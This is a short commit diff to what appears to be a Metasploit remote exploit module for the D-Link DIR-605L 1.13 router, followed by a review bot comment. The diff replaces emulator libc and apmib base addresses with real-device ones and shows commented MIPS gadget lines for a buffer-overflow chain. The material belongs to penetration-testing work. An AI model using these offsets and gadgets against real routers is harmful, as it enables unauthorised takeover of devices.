Add real device libraries base addresses

bug/bundler_fix
jvazquez-r7 2013-10-17 22:34:54 -05:00
parent 3d3a7b3818
commit a00a813649
1 changed files with 4 additions and 2 deletions


@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'DLink DIR-605L 1.13', [ 'DLink DIR-605L 1.13',
{ {
'Offset' => 94, 'Offset' => 94,
'LibcBase' => 0x4212e000, # QEMU environment 'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner
'ApmibBase' => 0x42095000, # QEMU environment 'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
#'LibcBase' => 0x4212e000, # QEMU environment
#'ApmibBase' => 0x42095000, # QEMU environment
#LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call #LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call
#LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow #LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow
#LOAD:000248DC jalr $t9 #LOAD:000248DC jalr $t9
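Review bot: The new `'LibcBase'` and `'ApmibBase'` values are documented only as "According to Original Exploit by Craig Heffner", which names a person but not a reference, and does not say whether the addresses were confirmed on a device running firmware 1.13 or copied as-is. Nothing in the hunk shows which, so the comment should state the validation status, e.g. `# from Craig Heffner's original exploit; not re-verified on hardware in this module` if that is the case. The previous QEMU values stay behind as commented-out hash entries directly below the live ones, where they are easy to mistake for active settings. Either delete them and rely on the commit history, or put one comment line above them saying they apply only to the emulated test setup. The target definition continues past the end of this hunk.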